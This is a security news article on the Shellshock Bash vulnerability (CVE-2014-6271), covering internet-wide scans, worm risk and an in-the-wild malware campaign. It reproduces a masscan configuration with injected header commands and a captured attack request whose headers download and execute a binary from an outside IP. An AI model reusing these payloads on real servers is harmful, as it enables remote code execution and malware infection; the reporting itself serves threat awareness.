Hackers target Bash Bug vulnerability in the wild

The critical vulnerability Bash Bug in common GNU shell could be exploited by botmaster to infect a huge number of machines on a large scale.

The recently discovered Bash Bug vulnerability, coded as CVE-2014-6271 and known also as “Shellshock,” is worrying the security community due to its impact on a large-scale. The remotely exploitable critical flaw affects Linux, Unix and Apple Mac OS X systems, but also a wide range of Internet of Things devices result vulnerable.

According to security experts, the Bash Bug vulnerability may already have been exploited in the wild by threat actors to hit Web servers. Malware researchers speculated that the critical flaw may be exploited by attackers which manage botnets to exploit a large number of machines exposed on the Internet.

Exactly as happened in the days successively to the disclosure of the Heartbleed bug, computer experts for various purposes are already running massive Internet scan to discover vulnerable servers in the wild and compromise them.

In a blog post published on the Errata Security blog, the expert Robert Graham revealed to have conducted a similar experiment discovering more than 3,000 servers affected by the Bash Bug before his scan broke after a short period.

The configuration file formasscan used by the expert looks something like:

target = 0.0.0.0/0
port = 80
banners = true
http-user-agent = shellshock-scan (http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html)
http-header[Cookie] = () { :; }; ping -c 3 209.126.230.74

http-header[Host] = () { :; }; ping -c 3 209.126.230.74
http-header[Referer] = () { :; }; ping -c 3 209.126.230.74

Unfortunately the number of greater than 3000 as revealed by Graham, who searched vulnerable servers only querying the port 80 used for normal Web Hypertext Transfer Protocol (HTTP) requests.

“It‘s things like CGI scripts that are vulnerable, deep within a website (like CPanel’s /cgi-sys/defaultwebpage.cgi),” Graham wrote.  “Getting just the root page is the thing least likely to be vulnerable. Spidering the site and testing well-known CGI scripts (like the CPanel one) would give a lot more results—at least 10x.”

According to another research conducted by experts at Ars using Google advanced search parameters, the number of web pages potentially exploitable for the presence of the Bash Bug is over two billion.

Graham confirmed that “this thing is clearly wormable and can easily worm past firewalls and infect lots of systems. One key question is whether Mac OS X and iPhone DHCP service is vulnerable—once the worm gets behind a firewall and runs a hostile DHCP server, that would  be ‘game over’ for large networks.”

Resuming, we have a critical flaw that affects an impressive number of devices worldwide, and in many cases these systems are not easily to patch, let’s consider for example to IoT components which run software with Bash embedded.

It ‘s very likely that the vulnerability has already been exploited, a system administrator using the @yinettesys Twitter account published a GitHub gist post reporting on a case in which threat actors exploited the Bash Bug flaw to launch kernet exploit on machine coordinating the attack with a C&C server hidden behind the Cloudflare content delivery network.

“I am not feeling well, but this is important. It’s the first 0day bash injected ELF malware spotted in ITW attack of CVE-2014-6271. ThIs sample was found via @Yinettesys’s (credit) IDS sigs: https://gist.github.com/anonymous/929d622f3b36b00c0be1
The sample is up and alive, my analysis I posted in VT (see the comment tab): https://www.virustotal.com/en/file/73b0 … 411634118/ Announced was 6h ago here: https://twitter.com/yinettesys/status/5 … 6268604416
And detection ratio is still ZERO..  “

The malicious campaign uses a Web GET request from a user agent called “.Thanks-Rob”.

GET./.HTTP/1.0.
User-Agent:.Thanks-Rob.
Cookie:().{.:;.};.wget.-O./tmp/besh.http://162.253.66.76/nginx;.chmod.777./tmp/besh;./tmp/besh;
.Host:().{.:;.};.wget.-O./tmp/besh.http://162.253.66.76/nginx;.chmod.777./tmp/besh;./tmp/besh;
.Referer:().{.:;.};.wget.-O./tmp/besh.http://162.253.66.76/nginx;.chmod.777./tmp/besh;./tmp/besh;
.Accept:.*/*

The attack appears to be a brute force based on a dictionary of credentials guesses, the malicious code served in the attack is a file named nginx which is still undetected by all the antivirus software in time I’m writing.

The exploit targets the server’s “/tmp” directory in a subdirectory called “besh.”, it has a zero detection rate on VirusTotal.

The experts noticed that the malware contacts the CnC server sending the text “PING” and received in return the response “PONG.”

“Oddly, according to one Hacker News poster who ran the binary of the malware on a virtual machine, the malware also sends a request to a Pastebin page (now removed) that was associated with analleged leak of nude photos of actress Emma Watson.” reports a blog post on the Bash Bug published by Ars Technica.

On Wednesday, AusCERT and MalwareMustDie reported that Bash Bug is being exploited in the wild.

According to data produced in a recent survey published by Netcraft, the number and types of Web servers being used worldwide is more than 1 billion servers, and that more than half of those are Apache servers, which run Linux and thus contain Bash by default.

The potential targets include home routers, medical equipment, SCADA/ICS devices and much more, for this reason the Bash Bug is considered by security experts more dangerous than Heartbleed flaw which affected only versions of OpenSSL released over a two-year period.

Bash bug has been around since 1989 and also recent versions are potentially exploitable exactly like outdated servers.

The real problem resides in the low complexity of a Bag Bug based attack, for threat actors is quite easy to run them against vulnerable servers.

Stay Tuned for further information!

Pierluigi Paganini

(Security Affairs – Bash Bug, Linux)